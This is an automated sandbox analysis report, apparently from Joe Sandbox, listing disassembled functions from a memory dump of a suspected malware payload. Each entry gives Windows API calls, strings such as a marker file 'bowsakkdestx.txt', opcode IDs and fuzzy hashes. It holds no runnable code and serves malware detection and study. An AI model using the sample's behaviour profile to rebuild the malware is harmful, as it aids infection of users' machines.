                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 9657ccf07bcf719369b45ab53dda355bfad423ad894c3e6383a306cfdb1b1fca
                                                                                                                            • Instruction ID: 93f1a1830850e2b934b0a57edb89352072d8fbc8a8b9b07c06adad945172c19e
                                                                                                                            • Opcode Fuzzy Hash: 9657ccf07bcf719369b45ab53dda355bfad423ad894c3e6383a306cfdb1b1fca
                                                                                                                            • Instruction Fuzzy Hash: 5201F73574030D7BF6209B51ED46FA67B6CA784B08F300411FA00BA1D1D6F5A609C790
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00E4FA53
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4FA71
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E4FA7B
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4FA89
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00E4FA94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: d2b4ecc5fb4f5ec96604c53a5afab19510955f25e3ad9e4e41b806fd17450261
                                                                                                                            • Instruction ID: d707e454045b1e455f3c70c887402aaade39795571d40c1d2963c143642954c1
                                                                                                                            • Opcode Fuzzy Hash: d2b4ecc5fb4f5ec96604c53a5afab19510955f25e3ad9e4e41b806fd17450261
                                                                                                                            • Instruction Fuzzy Hash: F8018631B41309BBEB209B55DD4AFA63BACAB84B44F644061FA04BE1D1D7E5A805C6A0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E47BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 6ea1777919e243330e70ac901f5ca9ea49d4a3c6aef3400a0416be5e365ea00e
                                                                                                                            • Instruction ID: d8331d93eec06a03e2c0e561de6004c817d56fdba511ba243f3100d70f9e570e
                                                                                                                            • Opcode Fuzzy Hash: 6ea1777919e243330e70ac901f5ca9ea49d4a3c6aef3400a0416be5e365ea00e
                                                                                                                            • Instruction Fuzzy Hash: B351C4317081059BDB24CE1CEC80A6AB7A6EF88714B24992DF8D5E7741DB31DD54CBD0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E529A9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __flsbuf__flush__getptd_noexit__write
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3115901604-2740779761
                                                                                                                            • Opcode ID: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                                            • Instruction ID: cea1dfc3e347b3d977f62a820d74a62a10857e7cf0ab6cae71699d4f9bf244c9
                                                                                                                            • Opcode Fuzzy Hash: c801ac2ca2d43139865efb7dfbd9e243acdf2f1ae776db3811a370f6b9bcd5c2
                                                                                                                            • Instruction Fuzzy Hash: EA41F6307007069FDB388EA9C8805AE77A5FF86366F149A2DEE15E7242D770DD898B50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E44160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                                            • Opcode ID: 47ce69d487dd2ab384bcba71184936ee3aec3a446cba281ef14402d8cc8ef6a9
                                                                                                                            • Instruction ID: 8b9f74ecd00423238aa6119fd0e267248bc2be4ba016cfa3924f9eb822dd2b1e
                                                                                                                            • Opcode Fuzzy Hash: 47ce69d487dd2ab384bcba71184936ee3aec3a446cba281ef14402d8cc8ef6a9
                                                                                                                            • Instruction Fuzzy Hash: 2C3108B13002049BDB28DE5CEC81E6A73B6EF807147605A1CF865EB3D5D771ED408B98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • UuidCreate.RPCRT4(?), ref: 00E3C5DA
                                                                                                                            • UuidToStringA.RPCRT4(?,00000000), ref: 00E3C5F6
                                                                                                                            • RpcStringFreeA.RPCRT4(00000000), ref: 00E3C640
                                                                                                                            Strings
                                                                                                                            • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00E3C687
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: StringUuid$CreateFree
                                                                                                                            • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                            • API String ID: 3044360575-2335240114
                                                                                                                            • Opcode ID: b824ae2a22620ec70fe34efc589098a20d2c5ad26b48409ff4cd0becf497f159
                                                                                                                            • Instruction ID: ea98e6782bf50a592f43ef1644b708aa62e8bc5ededb74a5db2d60e34037cc79
                                                                                                                            • Opcode Fuzzy Hash: b824ae2a22620ec70fe34efc589098a20d2c5ad26b48409ff4cd0becf497f159
                                                                                                                            • Instruction Fuzzy Hash: 2221D7722083059BD7109F24D809B6BBFE8AFC1758F205A6EF486A3291D775D548C793
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3C48B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3C4A9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            • Opcode ID: e6fd2d1fa8f770ecc90c4143fadbdf69a51ea1a8215f777bb910e34578d65fcd
                                                                                                                            • Instruction ID: 2020af52284f360ccf077cae33bc402cda834bb2f0ff48c65a43705c1d8d0e36
                                                                                                                            • Opcode Fuzzy Hash: e6fd2d1fa8f770ecc90c4143fadbdf69a51ea1a8215f777bb910e34578d65fcd
                                                                                                                            • Instruction Fuzzy Hash: 44014E7268122C37DD3065656C47FFB77AC8B52B21F1000E6FE08F6181D5A1954E97D1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E4BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00E4BA4A
                                                                                                                            • RegisterClassExW.USER32(00000030), ref: 00E4BA73
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassCursorLoadRegister
                                                                                                                            • String ID: 0$LPCWSTRszWindowClass
                                                                                                                            • API String ID: 1693014935-1496217519
                                                                                                                            • Opcode ID: b807bc5d15e2455ce8d10a81c160dc4f1c789e6bdd79e5e3c0ab3f07c9c777c3
                                                                                                                            • Instruction ID: 6f6d2c8e270301deba66e64c5d41728fc4b2548dac038d97cbb0acc1731acc36
                                                                                                                            • Opcode Fuzzy Hash: b807bc5d15e2455ce8d10a81c160dc4f1c789e6bdd79e5e3c0ab3f07c9c777c3
                                                                                                                            • Instruction Fuzzy Hash: C9F05FB0C0521D9BEB00DF95D9597AEBBB4BB08709F204159D5147A280D7BA1648CF95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3C438
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3C44E
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E3C45B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendDeleteFileFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 610490371-2616962270
                                                                                                                            • Opcode ID: e445c80d17fd94b65fee1bb6e59ce7d55820dce93a3dba963100261418869f2a
                                                                                                                            • Instruction ID: 6993095aeb2dfce0c68dce2043faefb1d077e7fd900b3bae3dba23c493b3561e
                                                                                                                            • Opcode Fuzzy Hash: e445c80d17fd94b65fee1bb6e59ce7d55820dce93a3dba963100261418869f2a
                                                                                                                            • Instruction Fuzzy Hash: 8BE0867564131C6BEB20ABA1DE8AFE5777C9B04B01F6040E2BB44F20C0D6B0E59CCB51
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E3ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove_strtok
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3446180046-0
                                                                                                                            • Opcode ID: 75e79b87ff06e7b4fd46e3c1a3862763a91e3b0b20d6364f2dc63fc122698dfb
                                                                                                                            • Instruction ID: 9b3afe36adf2731de8cc4a9f3ed42716a5cce18fc799dad76071add822861820
                                                                                                                            • Opcode Fuzzy Hash: 75e79b87ff06e7b4fd46e3c1a3862763a91e3b0b20d6364f2dc63fc122698dfb
                                                                                                                            • Instruction Fuzzy Hash: 9981AEB1900206DFDB14DF68D8887AABBF1FF14304F54592DE80677381D3B6AA54CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E52130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2974526305-0
                                                                                                                            • Opcode ID: c31dbfac69e29268885dd9740610b2e2fc9aaae200ab3f02fb3833fbabf7927d
                                                                                                                            • Instruction ID: ab98f10172b35a06ababd2f5d64193fb9dac99af64c9e392f74fc40a5304e34e
                                                                                                                            • Opcode Fuzzy Hash: c31dbfac69e29268885dd9740610b2e2fc9aaae200ab3f02fb3833fbabf7927d
                                                                                                                            • Instruction Fuzzy Hash: 52510739A017059BCB248FA989405AF77B1AF02326F249F2DFE35B62E1D7709D588B40
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00E6C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E6C6AD
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 00E6C6DB
                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,00E6C0ED,?,00BFBBEF,00000003), ref: 00E6C709
                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,00E6C0ED,?,00BFBBEF,00000003), ref: 00E6C73F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 5fe31c4179ee8a645b62d603f2a58d6f72a387213d02da4ce3f70b1f0b961225
                                                                                                                            • Instruction ID: be031e0d4234c2767dde4132727f3aab20c5b63b20679466c0eb9be49ad44abd
                                                                                                                            • Opcode Fuzzy Hash: 5fe31c4179ee8a645b62d603f2a58d6f72a387213d02da4ce3f70b1f0b961225
                                                                                                                            • Instruction Fuzzy Hash: 3D31E431640246EFDB218F75DC44BBE7BA5FF41794F25A42AE894A71A0D730E850DB90
